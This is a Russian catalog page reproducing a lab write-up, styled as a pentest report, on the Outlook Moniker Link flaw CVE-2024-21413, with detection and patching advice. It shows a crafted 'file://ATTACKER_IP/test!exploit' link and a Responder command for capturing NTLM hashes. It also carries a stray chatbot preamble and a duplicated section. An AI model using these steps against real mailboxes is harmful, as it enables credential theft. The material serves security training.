Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook- — 13 февраля 2024 года Microsoft опубликовала критическую уязвимость безопасности в Microsoft Outlook, получившую идентификатор CVE-2024-21413, известную как Moniker Link Vulnerability. Уязвимость позволяет злоумышленнику обойти механизм Protected View в Outlook. | Kitploit
Инструменты/GitHubGitHub/eylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеБезопасность Электронной ПочтыЛаборатории и Практика
GitHubeylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

13 февраля 2024 года Microsoft опубликовала критическую уязвимость безопасности в Microsoft Outlook, получившую идентификатор CVE-2024-21413, известную как Moniker Link Vulnerability. Уязвимость позволяет злоумышленнику обойти механизм Protected View в Outlook.

Репозиторий
88 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

13 февраля 2024 года Microsoft опубликовала критическую уязвимость безопасности в Microsoft Outlook, получившую идентификатор CVE-2024-21413 и известную как Moniker Link Vulnerability. Уязвимость позволяет злоумышленнику обойти механизм Protected View в Outlook. изображение

Отлично 👍 Ниже представлен полный перевод + оформление в виде отчёта о Penetration Testing (PT), на русском языке, профессионально и понятно. Как вы и просили – только перевод и оформление. Ответы, скриншоты и дополнения вы добавите сами, а если понадобится дальнейшая помощь – я помогу.


Отчёт по Penetration Testing

CVE-2024-21413 – Moniker Link (Microsoft Outlook)


🧩 Резюме для руководства (Executive Summary)

13 февраля 2024 года Microsoft опубликовала критическую уязвимость безопасности в Microsoft Outlook, получившую идентификатор CVE-2024-21413 и известную как Moniker Link Vulnerability.

Уязвимость позволяет злоумышленнику обойти механизм Protected View в Outlook с помощью специальной ссылки (Moniker Link), что заставляет клиент Outlook жертвы на сервер, контролируемый атакующим – без запуска файла и без эффективного предупреждения безопасности.

отправить учётные данные (NTLM hash)

Уязвимость может привести к утечке учётных данных и теоретически существует возможность удалённого выполнения кода (RCE).


📌 Сведения об уязвимости

ПараметрЗначение
ИдентификаторCVE-2024-21413
Дата публикации13 февраля 2024
ОбнаружительHaifei Li – Check Point Research
ВоздействиеУтечка учётных данных + потенциальный RCE
СерьёзностьКритическая
Сложность атакиНизкая
Оценка CVSS9.8
Официальная ссылкаhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413

🎯 Затронутые версии

Уязвимость затрагивает следующие версии:

  • Microsoft Office LTSC 2021 – с версии 19.0.0
  • Microsoft 365 Apps for Enterprise – с версии 16.0.1
  • Microsoft Office 2019 – с версии 16.0.1
  • Microsoft Office 2016 – до версии 16.0.5435.1001

🎓 Учебные цели (Learning Objectives)

  • Понимание принципа работы уязвимости
  • Знакомство с механизмом Outlook Protected View
  • Эксплуатация уязвимости для утечки учётных данных
  • Методы обнаружения (Detection)
  • Рекомендации по предотвращению (Mitigation)

(Описание уязвимости)

изображение

Microsoft Outlook позволяет отображать письма в формате HTML и обрабатывать ссылки разных типов, таких как http:// и https://. Кроме того, Outlook поддерживает специальные ссылки, называемые Moniker Links, которые позволяют запускать приложения или получать доступ к внешним ресурсам в операционной системе.

В нормальном режиме, когда письмо содержит ссылку, запускающую внешнее приложение или обращающуюся к системному ресурсу (например, ссылку вида file://), активируется механизм безопасности Protected View в Outlook. Этот механизм отображает предупреждение безопасности и блокирует опасные действия, такие как выполнение кода, макросы или доступ к внешним сетевым ресурсам.

Однако в Outlook была обнаружена уязвимость (CVE-2024-21413), которая позволяет обойти механизм Protected View с помощью простой манипуляции ссылкой типа Moniker Link.

Что мы обнаружили (Findings)

В ходе проверки было установлено, что использование обычной ссылки вида:

file://ATTACKER_IP/test

заставляет Outlook попытаться обратиться к сетевому ресурсу по протоколу SMB, но эта попытка блокируется Protected View.

В то же время, когда ссылка содержит специальный символ ! и дополнительную текстовую строку, например:

file://ATTACKER_IP/test!exploit

Outlook не активирует Protected View и выполняет попытку подключения к удалённому серверу.

Во время этой попытки:

Outlook пытается получить доступ к ресурсу через SMB

Выполняется автоматический запрос аутентификации

Учётные данные пользователя отправляются атакующему

Захватывается Windows netNTLMv2 хэш жертвы

Важно отметить, что удалённый общий ресурс не обязательно должен существовать, так как попытка аутентификации выполняется в любом случае.

Воздействие (Impact)

Уязвимость позволяет атакующему:

Утечку учётных данных пользователя (netNTLMv2 hash)

Выполнение офлайн-атак (Cracking / Pass-the-Hash)

Горизонтальное перемещение в корпоративной сети

Кроме того, поскольку Moniker Links используют механизм COM (Component Object Model) Windows, существует теоретическая возможность удалённого выполнения кода (RCE). Однако на момент проверки не существовало публичного Proof of Concept для реализации RCE через данную уязвимость.

Эксплуатация уязвимости (Exploitation)

В рамках атаки жертве отправляется письмо, содержащее Moniker Link, аналогичный тому, что был показан в предыдущей задаче. Цель атакующего – создать письмо со ссылкой Moniker Link, которая обходит механизм Protected View в Outlook, так что, как только жертва нажимает на ссылку, её клиент Outlook пытается загрузить файл с машины атакующего. Это действие приводит к тому, что netNTLMv2 хэш жертвы отправляется и захватывается атакующим.

Перед выполнением атаки рассмотрим Proof of Concept (PoC), созданный для демонстрации (также доступен на GitHub).

Автор: CMNatic | https://github.com/cmnatic Версия: 1.0 | 19/02/2024

Код написан на Python и отправляет HTML-письмо, содержащее вредоносную ссылку Moniker Link.

Описание PoC

PoC:

Принимает адрес электронной почты атакующего и адрес электронной почты жертвы

Требует пароль для аутентификации SMTP (В этой комнате пароль для [email protected]: attacker)

Содержит HTML-содержимое письма (html_content) с вредоносной ссылкой Moniker Link

Задаёт поля письма: Subject, From, To

Отправляет письмо через почтовый сервер

В реальном сценарии требуется SMTP-сервер под контролем атакующего (в этой комнате сервер уже предоставлен).

Прослушивание для захвата хэша – Responder

После отправки письма необходимо запустить инструмент прослушивания Responder на машине атакующего для захвата SMB-запросов.

В THM AttackBox имя интерфейса ens5:

responder -I ens5

Responder прослушивает SMB, LLMNR и NBT-NS запросы и позволяет захватывать учётные данные аутентификации.

Открытие машины жертвы

Откройте машину жертвы через окно split-screen

Запустите Outlook

Выберите опцию "I don't want to sign in or create an account"

Закройте окно ввода ключа продукта

Почтовый ящик жертвы уже предварительно настроен

Запуск эксплойта

На AttackBox:

Создайте новый файл с именем exploit.py

Вставьте в него код PoC

Перед запуском внесите изменения:

Обновите IP-адрес машины атакующего в Moniker Link (строка 12)

Замените значение MAILSERVER на адрес:

10.64.165.67

Затем выполните:

python3 exploit.py

Когда будет запрошен пароль – введите:

attacker

Если операция прошла успешно, появится сообщение:

Email delivered

Результат

После открытия письма на машине жертвы и нажатия на ссылку "Click me":

Outlook пытается подключиться к машине атакующего через SMB

Responder перехватывает попытку аутентификации

netNTLMv2 хэш пользователя успешно захвачен

Атака завершена успешно.

изображение

Detection

YARA

Было создано правило YARA Флорианом Ротом (Florian Roth), предназначенное для обнаружения писем, содержащих элемент file:\ внутри Moniker Link — что может указывать на попытку эксплуатации CVE-2024-21413.

Пример правила YARA (как показано в комнате):

Правило ищет общие характеристики письма (например, Subject: и Received:)

А также ищет подозрительный шаблон ссылки file://, указывающей на UNC-путь (\) вместе с распространённым расширением файла, включая символ ! в конце (характерный признак обхода Protected View)

(Сам код остаётся как в оригинале)

Wireshark

Кроме того, запрос SMB, исходящий от машины жертвы к машине атакующего, можно увидеть в захвате пакетов в Wireshark.

Во время запроса:

Выполняется попытка аутентификации SMB

Можно идентифицировать хэш типа netNTLMv2 (иногда в сокращённом/truncated виде)

Remediation

Предотвращение и усиление защиты (Remediation)

Microsoft включила обновления безопасности для устранения этой уязвимости в рамках февральского Patch Tuesday. Список соответствующих статей KB по версиям Office можно посмотреть по официальной ссылке Microsoft.

Настоятельно рекомендуется обновить Microsoft Office с помощью:

Windows Update

Microsoft Update Catalog

Кроме того, до завершения обновлений во всех системах, это важное напоминание о необходимости соблюдения базовых мер безопасности, в частности повышения осведомлённости пользователей, например:

Не нажимать на случайные ссылки, особенно из неожиданных писем

Просматривать предварительный просмотр ссылок перед нажатием

Передавать подозрительные письма ответственному за информационную безопасность в организации

Поскольку эта уязвимость обходит механизм Protected View в Outlook, невозможно настроить Outlook так, чтобы он блокировал эту атаку только с помощью изменений конфигурации.

Кроме того, полная блокировка протокола SMB не рекомендуется в большинстве организаций, так как этот протокол необходим для доступа к сетевым ресурсам и общим папкам. Однако возможно применение блокировок или ограничений на уровне брандмауэра в зависимости от политики организации и структуры сети.

Предотвращение и усиление защиты (Remediation)

Microsoft включила исправления безопасности для этой уязвимости в рамках февральского Patch Tuesday. Список соответствующих статей KB в зависимости от версии Office можно посмотреть по официальной ссылке Microsoft. Настоятельно рекомендуется обновить Microsoft Office с помощью:

Windows Update

Microsoft Update Catalog

Кроме того, до внедрения обновлений во всех системах, это важное напоминание о необходимости соблюдения базовых мер безопасности, в частности повышения осведомлённости пользователей, например:

Избегать нажатия на случайные ссылки, особенно из неожиданных писем

Проверять адрес ссылки (Preview) перед нажатием

Передавать подозрительные письма ответственному за информационную безопасность в организации

Поскольку эта уязвимость обходит механизм Protected View в Outlook, невозможно предотвратить атаку с помощью изменений конфигурации внутри самого Outlook.

Кроме того, полная блокировка протокола SMB не рекомендуется в большинстве организаций, так как этот протокол необходим для доступа к общим папкам и сетевым ресурсам. Однако возможно применение ограничений или блокировок на уровне брандмауэра в зависимости от политики безопасности и структуры корпоративной сети.

Скачать инструмент